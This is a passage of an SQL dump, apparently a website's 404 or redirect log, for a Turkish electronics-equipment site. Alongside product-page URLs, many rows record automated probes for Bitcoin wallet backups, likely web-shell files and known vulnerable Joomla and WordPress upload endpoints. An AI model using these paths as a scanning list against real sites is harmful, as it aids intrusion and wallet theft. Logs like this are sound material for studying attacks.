00:00:00',301),(17485,'https://3s-technologies.com.tr/tr/wallet.dat.zip',NULL,'','',2,0,'2018-01-02 05:27:57','0000-00-00 00:00:00',301),(17486,'https://3s-technologies.com.tr/tr/wallet.tar',NULL,'','',2,0,'2018-01-02 05:27:59','0000-00-00 00:00:00',301),(17487,'https://3s-technologies.com.tr/tr/wallet.tar.gz',NULL,'','',2,0,'2018-01-02 05:28:01','0000-00-00 00:00:00',301),(17488,'https://3s-technologies.com.tr/tr/wallet.zip',NULL,'','',2,0,'2018-01-02 05:28:02','0000-00-00 00:00:00',301),(17489,'https://3s-technologies.com.tr/tr/wallet_backup.dat',NULL,'','',2,0,'2018-01-02 05:28:04','0000-00-00 00:00:00',301),(17490,'https://3s-technologies.com.tr/tr/wallet_backup.dat.1',NULL,'','',2,0,'2018-01-02 05:28:07','0000-00-00 00:00:00',301),(17491,'https://3s-technologies.com.tr/tr/wallet_backup.dat.zip',NULL,'','',2,0,'2018-01-02 05:28:10','0000-00-00 00:00:00',301),(17492,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',1,0,'2018-01-02 07:26:58','0000-00-00 00:00:00',301),(17493,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&itemid=134&lang=tr',NULL,'','',6,0,'2018-01-02 08:42:18','0000-00-00 00:00:00',301),(17494,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&itemid=134&lang=en',NULL,'','',5,0,'2018-01-02 08:42:42','0000-00-00 00:00:00',301),(17495,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',3,0,'2018-01-02 09:32:11','0000-00-00 00:00:00',301),(17496,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/results,1-10',NULL,'','',8,0,'2018-01-02 11:37:23','0000-00-00 00:00:00',301),(17497,'http://3s-technologies.com.tr/tr/templates/system_infos.php',NULL,'http://site.ru','',1,0,'2018-01-02 12:05:12','0000-00-00 00:00:00',301),(17498,'http://3s-technologies.com.tr/tr/libraries/logo_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-01-02 12:08:02','0000-00-00 00:00:00',301),(17499,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/images/ws0.php',NULL,'http://site.ru','',1,0,'2018-01-02 13:24:59','0000-00-00 00:00:00',301),(17500,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/ãƒæ’ã‚â§ubuk-lehim/e-bar-26-detail',NULL,'','',9,0,'2018-01-02 16:30:11','0000-00-00 00:00:00',301),(17501,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/content/type/mamha.php',NULL,'http://site.ru','',1,0,'2018-01-02 16:35:19','0000-00-00 00:00:00',301),(17502,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/results,1-50',NULL,'','',1,0,'2018-01-02 16:43:28','0000-00-00 00:00:00',301),(17503,'http://3s-technologies.com.tr/tr/models.php',NULL,'http://site.ru','',10,0,'2018-01-02 17:52:35','0000-00-00 00:00:00',301),(17504,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2018-01-02 22:21:36','0000-00-00 00:00:00',301),(17505,'http://3s-technologies.com.tr/tr/conflg.php',NULL,'http://site.ru','',11,0,'2018-01-02 23:40:40','0000-00-00 00:00:00',301),(17506,'http://3s-technologies.com.tr/tr/administrator/logo_img.php.suspected',NULL,'http://site.ru','',3,0,'2018-01-03 02:35:16','0000-00-00 00:00:00',301),(17507,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole',NULL,'','',6,0,'2018-01-03 04:04:53','0000-00-00 00:00:00',301),(17508,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/404',NULL,'','',1,0,'2018-01-03 05:02:09','0000-00-00 00:00:00',301),(17509,'http://3s-technologies.com.tr/tr/xmlrpc/logo_img.php.suspected',NULL,'http://site.ru','',9,0,'2018-01-03 06:33:18','0000-00-00 00:00:00',301),(17510,'http://3s-technologies.com.tr/tr/xmlrpc/logo_img.php',NULL,'http://site.ru','',1,0,'2018-01-03 07:03:03','0000-00-00 00:00:00',301),(17511,'http://3s-technologies.com.tr/tr/libraries/joomla/base/content-ubh.php',NULL,'http://site.ru','',5,0,'2018-01-03 07:29:27','0000-00-00 00:00:00',301),(17512,'http://www.3s-technologies.com.tr/en/?option=com_myblog&task=ajaxupload',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_myblog&task=ajaxupload','',2,0,'2018-01-03 09:13:01','0000-00-00 00:00:00',301),(17513,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',2,0,'2018-01-03 13:38:05','0000-00-00 00:00:00',301),(17514,'http://3s-technologies.com.tr/tr/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library',NULL,'http://3s-technologies.com.tr/tr/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library','',2,0,'2018-01-03 14:51:19','0000-00-00 00:00:00',301),(17515,'http://3s-technologies.com.tr/tr/language/logo_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-01-03 14:57:56','0000-00-00 00:00:00',301),(17516,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',4,0,'2018-01-03 15:11:59','0000-00-00 00:00:00',301),(17517,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hä±z/by,category_name',NULL,'','',1,0,'2018-01-03 15:24:18','0000-00-00 00:00:00',301),(17518,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,pc.ordering,product_name/dirdesc/results,1-20',NULL,'','',2,0,'2018-01-03 16:19:29','0000-00-00 00:00:00',301),(17519,'http://3s-technologies.com.tr/en/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library',NULL,'http://3s-technologies.com.tr/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library','',2,0,'2018-01-03 17:28:08','0000-00-00 00:00:00',301),(17520,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/tel-lehim',NULL,'','',13,0,'2018-01-03 21:17:38','0000-00-00 00:00:00',301),(17521,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri',NULL,'','',6,0,'2018-01-03 23:23:46','0000-00-00 00:00:00',301),(17522,'http://3s-technologies.com.tr/tr/logo_img.php.suspected',NULL,'http://site.ru','',6,0,'2018-01-04 01:57:59','0000-00-00 00:00:00',301),(17523,'http://www.3s-technologies.com.tr/en/components/com_foxcontact/_func.php',NULL,'http://www.3s-technologies.com.tr/components/com_foxcontact/_func.php','',2,0,'2018-01-04 02:35:43','0000-00-00 00:00:00',301),(17524,'http://3s-technologies.com.tr/index.php/en/index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'http://3s-technologies.com.tr/index.php/en/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','',1,0,'2018-01-04 03:38:10','0000-00-00 00:00:00',301),(17525,'http://3s-technologies.com.tr/tr/index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'http://3s-technologies.com.tr/tr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','',31,0,'2018-01-04 04:29:45','0000-00-00 00:00:00',301),(17526,'http://3s-technologies.com.tr/en/?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'http://3s-technologies.com.tr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','',5,0,'2018-01-04 07:13:05','0000-00-00 00:00:00',301),(17527,'http://www.3s-technologies.com.tr/tr/?option=com_user&task=register',NULL,'','',14,0,'2018-01-04 07:55:23','0000-00-00 00:00:00',301),(17528,'http://www.3s-technologies.com.tr/tr/joomla/other-components/registration-form',NULL,'','',15,0,'2018-01-04 07:55:23','0000-00-00 00:00:00',301),(17529,'http://www.3s-technologies.com.tr/tr/?option=com_community&view=register',NULL,'','',15,0,'2018-01-04 07:55:25','0000-00-00 00:00:00',301),(17530,'http://www.3s-technologies.com.tr/tr/component/user/register.html',NULL,'','',15,0,'2018-01-04 07:55:25','0000-00-00 00:00:00',301),(17531,'http://www.3s-technologies.com.tr/tr/registration/registers',NULL,'','',15,0,'2018-01-04 07:55:26','0000-00-00 00:00:00',301),(17532,'http://www.3s-technologies.com.tr/tr/registratsiya/registers',NULL,'','',15,0,'2018-01-04 07:55:26','0000-00-00 00:00:00',301),(17533,'http://www.3s-technologies.com.tr/tr/component/comprofiler/registers.html',NULL,'','',15,0,'2018-01-04 07:55:27','0000-00-00 00:00:00',301),(17534,'http://www.3s-technologies.com.tr/tr/user/registration',NULL,'','',15,0,'2018-01-04 07:55:27','0000-00-00 00:00:00',301),(17535,'http://www.3s-technologies.com.tr/tr/?option=com_secureregistration&task=register',NULL,'','',15,0,'2018-01-04 07:55:27','0000-00-00 00:00:00',301),(17536,'http://www.3s-technologies.com.tr/tr/component/option,com_comprofiler/task,registers',NULL,'','',15,0,'2018-01-04 07:55:28','0000-00-00 00:00:00',301),(17537,'http://www.3s-technologies.com.tr/tr/?option=com_comprofiler&task=registers',NULL,'','',30,0,'2018-01-04 07:55:30','0000-00-00 00:00:00',301),(17538,'http://www.3s-technologies.com.tr/tr/?option=com_joocm&view=register',NULL,'','',15,0,'2018-01-04 07:55:30','0000-00-00 00:00:00',301),(17539,'http://www.3s-technologies.com.tr/tr/?option=com_easysocial&view=registration',NULL,'','',24,0,'2018-01-04 07:55:31','0000-00-00 00:00:00',301),(17540,'http://3s-technologies.com.tr/tr/images/create-cms-user.php',NULL,'http://site.ru','',1,0,'2018-01-04 08:00:05','0000-00-00 00:00:00',301),(17541,'http://3s-technologies.com.tr/tr/templates/ja_drimia_bk/index.php',NULL,'http://site.ru','',1,0,'2018-01-04 08:35:47','0000-00-00 00:00:00',301),(17542,'http://3s-technologies.com.tr/tr/xmlrpc/header_img.php',NULL,'http://site.ru','',1,0,'2018-01-04 09:03:33','0000-00-00 00:00:00',301),(17543,'http://3s-technologies.com.tr/tr/templates/header_img.php',NULL,'http://site.ru','',1,0,'2018-01-04 10:22:31','0000-00-00 00:00:00',301),(17544,'http://3s-technologies.com.tr/tr/templates/ja_drimia_bk/index.php.suspected',NULL,'http://site.ru','',3,0,'2018-01-04 10:39:04','0000-00-00 00:00:00',301),(17545,'http://www.3s-technologies.com.tr/tr/index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',19,0,'2018-01-04 17:32:43','0000-00-00 00:00:00',301),(17546,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z',NULL,'','',14,0,'2018-01-04 19:31:20','0000-00-00 00:00:00',301),(17547,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri',NULL,'','',5,0,'2018-01-04 21:09:33','0000-00-00 00:00:00',301),(17548,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,mf_name/results,1-5',NULL,'','',3,0,'2018-01-05 00:05:12','0000-00-00 00:00:00',301),(17549,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/flux',NULL,'','',7,0,'2018-01-05 00:29:35','0000-00-00 00:00:00',301),(17550,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,mf_name/results,1-50',NULL,'','',5,0,'2018-01-05 01:57:32','0000-00-00 00:00:00',301),(17551,'http://www.3s-technologies.com.tr/en/0day.php',NULL,'http://www.3s-technologies.com.tr/0day.php','',1,0,'2018-01-05 02:35:32','0000-00-00 00:00:00',301),(17552,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/krem-lehim',NULL,'','',14,0,'2018-01-05 03:30:10','0000-00-00 00:00:00',301),(17553,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_sku/results,1-5',NULL,'','',7,0,'2018-01-05 04:00:07','0000-00-00 00:00:00',301),(17554,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_name/results,1-5',NULL,'','',8,0,'2018-01-05 04:41:09','0000-00-00 00:00:00',301),(17555,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/ddm-novastar',NULL,'','',5,0,'2018-01-05 05:01:03','0000-00-00 00:00:00',301),(17556,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_sku/results,1-10',NULL,'','',4,0,'2018-01-05 05:11:38','0000-00-00 00:00:00',301),(17557,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_name/results,1-10',NULL,'','',2,0,'2018-01-05 05:26:50','0000-00-00 00:00:00',301),(17558,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc/results,1-50',NULL,'','',2,0,'2018-01-05 05:47:06','0000-00-00 00:00:00',301),(17559,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-orta-hızlı',NULL,'','',9,0,'2018-01-05 05:57:18','0000-00-00 00:00:00',301),(17560,'http://3s-technologies.com.tr/tr/media/editors/codemirror/mode/d/update.php',NULL,'http://site.ru','',2,0,'2018-01-05 07:17:07','0000-00-00 00:00:00',301),(17561,'http://3s-technologies.com.tr/tr/administrator/components/com_redirect/controllers/backup.php',NULL,'http://site.ru','',4,0,'2018-01-05 07:17:07','0000-00-00 00:00:00',301),(17562,'http://3s-technologies.com.tr/tr/components/com_kunena/controller/announcement/edit/edit.php',NULL,'http://site.ru','',4,0,'2018-01-05 07:44:06','0000-00-00 00:00:00',301),(17563,'http://3s-technologies.com.tr/tr/plugins/system/plg_system_anticopy/index.php',NULL,'http://site.ru','',1,0,'2018-01-05 07:54:19','0000-00-00 00:00:00',301),(17564,'http://3s-technologies.com.tr/tr/cache/content-post.php',NULL,'http://site.ru','',5,0,'2018-01-05 09:14:47','0000-00-00 00:00:00',301),(17565,'http://3s-technologies.com.tr/tr/authorize.php',NULL,'http://site.ru','',17,0,'2018-01-05 09:31:26','0000-00-00 00:00:00',301),(17566,'http://www.3s-technologies.com.tr/en/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','',9,0,'2018-01-05 13:26:12','0000-00-00 00:00:00',301),(17567,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-166/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-166/style.css','',3,0,'2018-01-06 01:40:24','0000-00-00 00:00:00',301),(17568,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/aqueous',NULL,'','',1,0,'2018-01-06 02:16:39','0000-00-00 00:00:00',301),(17569,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',6,0,'2018-01-06 05:25:13','0000-00-00 00:00:00',301),(17570,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/pagebreak/thumbs.php',NULL,'http://site.ru','',1,0,'2018-01-06 08:34:18','0000-00-00 00:00:00',301),(17571,'http://3s-technologies.com.tr/tr/libraries/css.php',NULL,'http://site.ru','',3,0,'2018-01-06 08:34:58','0000-00-00 00:00:00',301),(17572,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme',NULL,'','',14,0,'2018-01-06 08:52:09','0000-00-00 00:00:00',301),(17573,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/gino/k.php',NULL,'http://site.ru','',1,0,'2018-01-06 09:29:52','0000-00-00 00:00:00',301),(17574,'http://3s-technologies.com.tr/tr/administrator/components/com_k2/views/user/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2018-01-06 10:11:52','0000-00-00 00:00:00',301),(17575,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/tel-lehim',NULL,'','',15,0,'2018-01-06 13:24:04','0000-00-00 00:00:00',301),(17576,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±',NULL,'','',4,0,'2018-01-06 13:25:09','0000-00-00 00:00:00',301),(17577,'http://3s-technologies.com.tr/tr/plugins/content/pagenavigation/tmpl/print.php',NULL,'http://site.ru','',1,0,'2018-01-06 13:26:12','0000-00-00 00:00:00',301),(17578,'http://3s-technologies.com.tr/tr/tmp/inj.php',NULL,'http://site.ru','',1,0,'2018-01-06 13:30:16','0000-00-00 00:00:00',301),(17579,'http://3s-technologies.com.tr/tr/components/com_weblinks/views/categories/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2018-01-06 14:05:37','0000-00-00 00:00:00',301),(17580,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/results,1-5',NULL,'','',5,0,'2018-01-06 15:51:04','0000-00-00 00:00:00',301),(17581,'http://3s-technologies.com.tr/tr/components/com_content/models/content.php',NULL,'http://site.ru','',1,0,'2018-01-06 16:19:30','0000-00-00 00:00:00',301),(17582,'http://3s-technologies.com.tr/tr/images/mod_config.php',NULL,'http://site.ru','',2,0,'2018-01-06 16:19:35','0000-00-00 00:00:00',301),(17583,'http://3s-technologies.com.tr/tr/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/img.php',NULL,'http://site.ru','',1,0,'2018-01-06 16:29:59','0000-00-00 00:00:00',301),(17584,'http://3s-technologies.com.tr/tr/images/media.php',NULL,'http://site.ru','',1,0,'2018-01-06 16:57:18','0000-00-00 00:00:00',301),(17585,'http://3s-technologies.com.tr/tr/components/com_plugins/models/item.php',NULL,'http://site.ru','',2,0,'2018-01-06 16:57:26','0000-00-00 00:00:00',301),(17586,'http://3s-technologies.com.tr/tr/images/simple.php',NULL,'http://site.ru','',2,0,'2018-01-06 16:57:33','0000-00-00 00:00:00',301),(17587,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/results,1-50',NULL,'','',4,0,'2018-01-06 17:03:05','0000-00-00 00:00:00',301),(17588,'http://3s-technologies.com.tr/tr/cache/strange.php',NULL,'http://site.ru','',1,0,'2018-01-06 17:34:45','0000-00-00 00:00:00',301),(17589,'http://3s-technologies.com.tr/tr/libraries/joomla/client/wrapper/print.php.suspected',NULL,'http://site.ru','',1,0,'2018-01-06 17:35:12','0000-00-00 00:00:00',301),(17590,'http://3s-technologies.com.tr/tr/plugins/system/logins.php',NULL,'http://site.ru','',2,0,'2018-01-06 17:44:12','0000-00-00 00:00:00',301),(17591,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/results,1-10',NULL,'','',4,0,'2018-01-06 18:04:47','0000-00-00 00:00:00',301),(17592,'http://3s-technologies.com.tr/tr/images/content-wrapper.php',NULL,'http://site.ru','',1,0,'2018-01-06 18:14:55','0000-00-00 00:00:00',301),(17593,'http://3s-technologies.com.tr/tr/includes/database.cfg.php',NULL,'http://site.ru','',1,0,'2018-01-06 18:15:05','0000-00-00 00:00:00',301),(17594,'http://3s-technologies.com.tr/tr/components/com_weblinks/wlink.php',NULL,'http://site.ru','',3,0,'2018-01-06 18:39:20','0000-00-00 00:00:00',301),(17595,'http://3s-technologies.com.tr/tr/administrator/components/com_installer/helpers/html/config.php',NULL,'http://site.ru','',1,0,'2018-01-06 18:45:33','0000-00-00 00:00:00',301),(17596,'http://3s-technologies.com.tr/tr/cli/run_cron.php',NULL,'http://site.ru','',1,0,'2018-01-06 19:16:19','0000-00-00 00:00:00',301),(17597,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme',NULL,'','',4,0,'2018-01-06 19:31:59','0000-00-00 00:00:00',301),(17598,'http://3s-technologies.com.tr/tr/print.php',NULL,'http://site.ru','',7,0,'2018-01-06 19:51:59','0000-00-00 00:00:00',301),(17599,'http://3s-technologies.com.tr/tr/print.php',NULL,'http://site.ru','',1,0,'2018-01-06 19:51:59','0000-00-00 00:00:00',301),(17600,'http://3s-technologies.com.tr/tr/administrator/components/com_search/views/searches/config.php',NULL,'http://site.ru','',3,0,'2018-01-06 21:04:57','0000-00-00 00:00:00',301),(17601,'http://3s-technologies.com.tr/tr/components/com_search/views/views.php',NULL,'http://site.ru','',2,0,'2018-01-06 21:42:19','0000-00-00 00:00:00',301),(17602,'http://3s-technologies.com.tr/tr/administrator/components/com_newsfeeds/controllers/backup.php',NULL,'http://site.ru','',1,0,'2018-01-06 22:17:38','0000-00-00 00:00:00',301),(17603,'http://3s-technologies.com.tr/tr/components/com_finder/views/search/tmpl/config.php',NULL,'http://site.ru','',2,0,'2018-01-06 22:17:38','0000-00-00 00:00:00',301),(17604,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/dirdesc/results,1-10',NULL,'','',5,0,'2018-01-07 02:23:08','0000-00-00 00:00:00',301),(17605,'http://3s-technologies.com.tr/tr/modules/mod_articless/mod_articless.php',NULL,'http://site.ru','',3,0,'2018-01-07 02:41:23','0000-00-00 00:00:00',301),(17606,'http://3s-technologies.com.tr/tr/modules/mod_text/helpers/view.php',NULL,'http://site.ru','',1,0,'2018-01-07 02:41:27','0000-00-00 00:00:00',301),(17607,'http://3s-technologies.com.tr/tr/images/ini.php',NULL,'http://site.ru','',1,0,'2018-01-07 03:19:05','0000-00-00 00:00:00',301),(17608,'http://3s-technologies.com.tr/tr/modules/mod_search/search.html.php',NULL,'http://site.ru','',2,0,'2018-01-07 03:20:38','0000-00-00 00:00:00',301),(17609,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/dirdesc/results,1-50',NULL,'','',2,0,'2018-01-07 03:50:25','0000-00-00 00:00:00',301),(17610,'http://3s-technologies.com.tr/tr/outpost.php',NULL,'http://site.ru','',7,0,'2018-01-07 03:56:51','0000-00-00 00:00:00',301),(17611,'http://3s-technologies.com.tr/tr/administrator/components/com_redirect/models/forms/cache_log.php',NULL,'http://site.ru','',4,0,'2018-01-07 04:33:40','0000-00-00 00:00:00',301),(17612,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name/results,1-5',NULL,'','',5,0,'2018-01-07 05:06:47','0000-00-00 00:00:00',301),(17613,'http://3s-technologies.com.tr/tr/components/com_content/views/category/tmpl/config.php',NULL,'http://site.ru','',1,0,'2018-01-07 05:47:46','0000-00-00 00:00:00',301),(17614,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name/results,1-50',NULL,'','',5,0,'2018-01-07 06:01:18','0000-00-00 00:00:00',301),(17615,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&itemid=130&lang=en',NULL,'','',7,0,'2018-01-07 06:23:08','0000-00-00 00:00:00',301),(17616,'http://3s-technologies.com.tr/tr/libraries/joomla/jmail.php',NULL,'http://site.ru','',59,0,'2018-01-07 06:43:33','0000-00-00 00:00:00',301),(17617,'http://3s-technologies.com.tr/tr/libraries/library.php',NULL,'http://site.ru','',2,0,'2018-01-07 07:12:15','0000-00-00 00:00:00',301),(17618,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku/results,1-5',NULL,'','',4,0,'2018-01-07 07:17:40','0000-00-00 00:00:00',301),(17619,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&itemid=57&lang=tr',NULL,'','',5,0,'2018-01-07 07:39:29','0000-00-00 00:00:00',301),(17620,'http://3s-technologies.com.tr/tr/images/sbin.php',NULL,'http://site.ru','',2,0,'2018-01-07 08:13:26','0000-00-00 00:00:00',301),(17621,'http://3s-technologies.com.tr/tr/mod_config.php',NULL,'http://site.ru','',6,0,'2018-01-07 08:22:54','0000-00-00 00:00:00',301),(17622,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku/results,1-10',NULL,'','',5,0,'2018-01-07 08:44:56','0000-00-00 00:00:00',301),(17623,'http://3s-technologies.com.tr/tr/images/set.php.',NULL,'http://site.ru','',1,0,'2018-01-07 09:22:46','0000-00-00 00:00:00',301),(17624,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/results,1-5',NULL,'','',2,0,'2018-01-07 09:28:34','0000-00-00 00:00:00',301),(17625,'http://3s-technologies.com.tr/tr/readme.php',NULL,'http://site.ru','',219,0,'2018-01-07 09:30:43','0000-00-00 00:00:00',301),(17626,'http://3s-technologies.com.tr/tr/librareis.php',NULL,'http://site.ru','',2,0,'2018-01-07 10:02:46','0000-00-00 00:00:00',301),(17627,'http://3s-technologies.com.tr/tr/cache/wp-post.php',NULL,'http://site.ru','',1,0,'2018-01-07 10:09:33','0000-00-00 00:00:00',301),(17628,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',3,0,'2018-01-07 12:38:13','0000-00-00 00:00:00',301),(17629,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',6,0,'2018-01-07 13:42:49','0000-00-00 00:00:00',301),(17630,'http://www.3s-technologies.com.tr/tr/components/com_b2jcontact',NULL,'','',4,0,'2018-01-07 14:35:41','0000-00-00 00:00:00',301),(17631,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturers/aqueous?tmpl=component',NULL,'','',4,0,'2018-01-07 15:42:49','0000-00-00 00:00:00',301),(17632,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',5,0,'2018-01-07 16:56:40','0000-00-00 00:00:00',301),(17633,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',3,0,'2018-01-07 18:19:48','0000-00-00 00:00:00',301),(17634,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/ã§ubuk-lehim',NULL,'','',15,0,'2018-01-07 19:02:03','0000-00-00 00:00:00',301),(17635,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/panasonic',NULL,'','',4,0,'2018-01-07 19:12:36','0000-00-00 00:00:00',301),(17636,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',5,0,'2018-01-07 19:42:48','0000-00-00 00:00:00',301),(17637,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name/results,1-5',NULL,'','',5,0,'2018-01-07 20:38:11','0000-00-00 00:00:00',301),(17638,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/aqueous',NULL,'','',3,0,'2018-01-07 23:03:48','0000-00-00 00:00:00',301),(17639,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',5,0,'2018-01-07 23:58:41','0000-00-00 00:00:00',301),(17640,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,ordering/results,1-5',NULL,'','',8,0,'2018-01-08 05:01:03','0000-00-00 00:00:00',301),(17641,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name/results,1-10',NULL,'','',3,0,'2018-01-08 07:23:36','0000-00-00 00:00:00',301),(17642,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/konveyorler',NULL,'','',13,0,'2018-01-08 08:46:57','0000-00-00 00:00:00',301),(17643,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fä±rä±n',NULL,'','',7,0,'2018-01-08 08:48:17','0000-00-00 00:00:00',301),(17644,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name/results,1-50',NULL,'','',1,0,'2018-01-08 09:44:56','0000-00-00 00:00:00',301),(17645,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name/results,1-20',NULL,'','',1,0,'2018-01-08 10:36:21','0000-00-00 00:00:00',301),(17646,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hä±z/by,product_name',NULL,'','',1,0,'2018-01-08 12:23:42','0000-00-00 00:00:00',301),(17647,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,ordering/results,1-10',NULL,'','',4,0,'2018-01-08 13:10:38','0000-00-00 00:00:00',301),(17648,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,ordering/results,1-20',NULL,'','',4,0,'2018-01-08 13:56:21','0000-00-00 